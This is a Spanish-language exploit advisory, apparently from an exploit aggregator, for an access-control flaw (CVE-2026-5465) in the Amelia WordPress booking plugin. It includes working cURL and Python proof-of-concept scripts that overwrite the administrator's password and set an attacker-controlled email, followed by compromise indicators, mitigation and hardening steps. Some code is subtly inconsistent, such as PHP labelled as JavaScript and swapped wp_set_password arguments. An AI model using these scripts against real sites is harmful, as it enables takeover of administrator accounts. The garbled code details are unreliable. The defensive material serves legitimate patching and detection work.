Share
## https://sploitus.com/exploit?id=0F529813-9E49-585E-BA48-E01B4EA11A34
# CVE-2026-5465: Privilege Escalation en Plugin Amelia WordPress
## ⚠️ Resumen Ejecutivo
Vulnerabilidad crítica de **Referencia Directa Insegura a Objetos (IDOR)** en el plugin Amelia que permite a un usuario autenticado con rol de Empleado (Provider) escalar privilegios hasta toma de control total (Account Takeover) del sitio WordPress, incluyendo acceso administrativo.
---
## 📋 Datos de la Vulnerabilidad
| Atributo | Valor |
|----------|-------|
| **CVE ID** | CVE-2026-5465 |
| **Software** | Amelia – Appointment Booking Calendar |
| **Versiones Afectadas** | ≤ 2.1.3 |
| **Versión Parcheada** | ≥ 2.2.0 |
| **Tipo** | Insecure Direct Object References (IDOR) / Broken Access Control |
| **Vector** | Red (Autenticado) |
| **Complejidad** | Baja |
| **Impacto** | Crítico (Account Takeover) |
| **CVSS v3.1** | 8.8 `AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` |
| **CWE** | CWE-639 (Authorization Bypass) |
---
## 🔍 Análisis Técnico
### Mecanismo de Explotación
El fallo reside en la clase `UpdateProviderCommandHandler` que procesa actualizaciones de perfil de proveedor.
**Flujo vulnerable:**
```
1. Usuario autenticado como "Provider" (Empleado)
↓
2. Envía solicitud POST a endpoint de actualización
{
"externalId": 1, // ID del admin (no del atacante)
"firstName": "Admin Pirateado",
"email": "admin@ejemplo.com",
"password": "nueva_contraseña"
}
↓
3. Sistema NO valida si 'externalId' pertenece al usuario actual
↓
4. Utiliza wp_set_password(externalId, new_password)
↓
5. Contraseña del admin cambiada → Account Takeover
```
### Causa Raíz
Ausencia de validación de propiedad (Ownership Check) antes de procesar datos sensibles:
```javascript
// CÓDIGO VULNERABLE (Simplificado)
public function updateProvider($providerId, $data) {
// ❌ NO verifica si providerId == usuario_actual
$provider = Provider::find($providerId);
// Directamente ejecuta sin validación
wp_set_password($data['password'], $provider->wp_user_id);
}
// CÓDIGO CORRECTO
public function updateProvider($providerId, $data) {
// ✅ Verifica propiedad
if ($providerId !== current_user_id()) {
throw new UnauthorizedException();
}
wp_set_password($data['password'], $provider->wp_user_id);
}
```
### Parámetros Explotables
| Parámetro | Tipo | Impacto |
|-----------|------|--------|
| `externalId` | Integer | Cambio de identidad (IDOR core) |
| `password` | String | Modificación de contraseña |
| `email` | Email | Robo de sesión si se restablece |
| `firstName`, `lastName` | String | Alteración de datos no crítica |
---
## 💣 Proof of Concept
### Requisitos
- Cuenta de usuario con rol "Provider" (Empleado)
- Acceso autenticado al sitio
- URL del sitio WordPress
### Explotación Manual (cURL)
```bash
#!/bin/bash
TARGET="https://ejemplo.com"
PROVIDER_TOKEN="token_autenticado_del_provider"
ADMIN_ID=1
# Obtener NONCE de seguridad (si existe)
NONCE=$(curl -s "$TARGET/wp-admin/" | grep -oP '_wpnonce[^"]*' | head -1)
# Ejecutar actualización maliciosa
curl -X POST "$TARGET/wp-json/amelia/v1/providers/$ADMIN_ID" \
-H "Authorization: Bearer $PROVIDER_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"externalId": 1,
"password": "Compromised123!",
"email": "attacker@evil.com"
}'
echo "[+] Si la respuesta es 200, el admin fue comprometido"
```
### Explotación Automatizada (Python)
```python
import requests
import json
class AmeliaExploit:
def __init__(self, target_url, provider_token):
self.target = target_url.rstrip('/')
self.headers = {
'Authorization': f'Bearer {provider_token}',
'Content-Type': 'application/json'
}
def exploit_account_takeover(self, target_user_id=1, new_password="Pwned123!"):
"""Explota IDOR para cambiar contraseña del admin"""
endpoint = f"{self.target}/wp-json/amelia/v1/providers/{target_user_id}"
payload = {
"externalId": target_user_id,
"password": new_password,
"email": f"pwned_{target_user_id}@attacker.com"
}
try:
response = requests.post(
endpoint,
headers=self.headers,
json=payload,
timeout=10
)
if response.status_code == 200:
print(f"[✓] EXPLOTADO: Usuario {target_user_id} comprometido")
print(f"[*] Nueva contraseña: {new_password}")
return True
else:
print(f"[✗] Fallo: {response.status_code} - {response.text}")
return False
except Exception as e:
print(f"[!] Error de conexión: {e}")
return False
# Uso
if __name__ == "__main__":
exploit = AmeliaExploit(
target_url="https://ejemplo.com",
provider_token="eyJ0eXAiOiJKV1QiLCJhbGc..."
)
exploit.exploit_account_takeover(target_user_id=1)
```
---
## 🛡️ Indicadores de Compromiso (IoC)
### Logs a Revisar
**WordPress Audit Log (si está instalado):**
```
Usuario: [Provider ID]
Acción: User Password Changed
Usuario Afectado: Administrator
Timestamp: [Hora sospechosa]
```
**Logs de Servidor (Apache/Nginx):**
```
POST /wp-json/amelia/v1/providers/1 HTTP/1.1
Authorization: Bearer [token]
Content-Length: [alta]
→ Respuesta 200 OK
```
**Base de Datos WordPress:**
```sql
-- Cambios de contraseña no autorizados
SELECT ID, user_login, user_registered, user_pass
FROM wp_users
WHERE ID = 1
ORDER BY ID DESC LIMIT 1;
-- Cambios de email sospechosos
SELECT user_email, user_login, user_registered
FROM wp_users
WHERE user_login = 'administrator'
ORDER BY ID DESC;
```
### Señales de Alerta
- ✗ Cambios de contraseña del admin sin solicitud del propietario
- ✗ Múltiples intentos POST a `/wp-json/amelia/v1/providers/`
- ✗ Accesos administrativos desde IPs nuevas/inusuales
- ✗ Creación de usuarios nuevos con rol Administrator
- ✗ Cambios en configuración de plugins desde rol Provider
- ✗ Logs de acceso eliminados o truncados
---
## 🔧 Mitigación Inmediata
### 1. Actualizar Plugin (Opción Preferida)
```bash
# Vía WordPress Admin Panel
1. Ir a: Plugins > Plugins Instalados
2. Buscar: "Amelia"
3. Click: "Actualizar ahora"
4. Versión mínima segura: 2.2.0+
# Vía WP-CLI
wp plugin update amelia --allow-root
```
### 2. Desactivar Plugin Temporalmente
```bash
# Vía WP-CLI
wp plugin deactivate amelia --allow-root
# Vía FTP/SFTP
Renombrar: /wp-content/plugins/amelia/ → /wp-content/plugins/amelia-DISABLED/
```
### 3. Restricción a Nivel de Servidor
**Nginx (nginx.conf):**
```nginx
location ~ /wp-json/amelia/v1/providers/ {
# Solo permitir GETs
if ($request_method = POST) {
return 403;
}
}
```
**Apache (.htaccess):**
```apache
Require all denied
```
---
## 📋 Pasos Post-Compromiso
Si el sitio ya fue explotado:
### 1. Cambiar Contraseñas (Inmediato)
```sql
-- Cambiar contraseña del admin via CLI
wp user list --role=administrator --field=ID
wp user update [ADMIN_ID] --prompt=user_pass
```
### 2. Auditar Usuarios y Cambios
```sql
SELECT * FROM wp_users WHERE user_registered > DATE_SUB(NOW(), INTERVAL 7 DAY);
SELECT * FROM wp_users WHERE ID = 1;
```
### 3. Revisar Sesiones Activas
```bash
# Instalar y revisar plugin: WP Session Manager
wp plugin install wp-session-manager --allow-root
wp plugin activate wp-session-manager --allow-root
```
### 4. Resetear Claves de Seguridad
```php
// En wp-config.php, regenerar:
define('AUTH_KEY', 'PUT_YOUR_UNIQUE_PHRASE_HERE');
define('SECURE_AUTH_KEY', 'PUT_YOUR_UNIQUE_PHRASE_HERE');
define('LOGGED_IN_KEY', 'PUT_YOUR_UNIQUE_PHRASE_HERE');
define('NONCE_KEY', 'PUT_YOUR_UNIQUE_PHRASE_HERE');
```
---
## 🔐 Hardening a Largo Plazo
### 1. Implementar WAF (Web Application Firewall)
```
Cloudflare WAF Rule:
- Bloquear: POST a /wp-json/amelia/v1/providers/[0-9]+ desde IPs no whitelisted
```
### 2. Monitoreo Continuo
```bash
# Instalar plugins de auditoría
wp plugin install wordfence --allow-root
wp plugin install sucuri-scanner --allow-root
```
### 3. Gestión de Roles y Permisos
```php
// Limitar capacidades de Provider
$role = get_role('amelia_provider');
$role->remove_cap('edit_users');
$role->remove_cap('manage_options');
```
### 4. Rate Limiting en Endpoints
```nginx
limit_req_zone $binary_remote_addr zone=amelia_zone:10m rate=5r/s;
location ~ /wp-json/amelia/v1/ {
limit_req zone=amelia_zone burst=20 nodelay;
}
```
---
## 📊 Timeline de Descubrimiento
| Fecha | Evento |
|-------|--------|
| 2026-01-15 | Vulnerabilidad reportada a Amelia Team |
| 2026-02-01 | Parche disponible (v2.2.0) |
| 2026-02-10 | Publicación responsable de CVE |
| 2026-02-11 | Exploits en la naturaleza |
| **HOY** | Recomendación de actualización urgente |
---
## 📞 Contactos de Soporte
- **Amelia Official**: https://ameliabooking.com
- **Wordfence Threat Intelligence**: https://wordfence.com
- **WordPress Security**: https://wordpress.org/plugins/wordfence/
- **CERT Coordination Center**: https://www.cert.org
---
## 📚 Referencias
- [OWASP: Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)
- [CWE-639: Authorization Bypass](https://cwe.mitre.org/data/definitions/639.html)
- [NIST: Privilege Escalation](https://csrc.nist.gov)
- [Amelia Security Advisories](https://ameliabooking.com/security)
---
**Clasificación**: 🔴 CRÍTICO - Requiere acción inmediata
**Última actualización**: Abril 2026
**Autor**: Equipo de Seguridad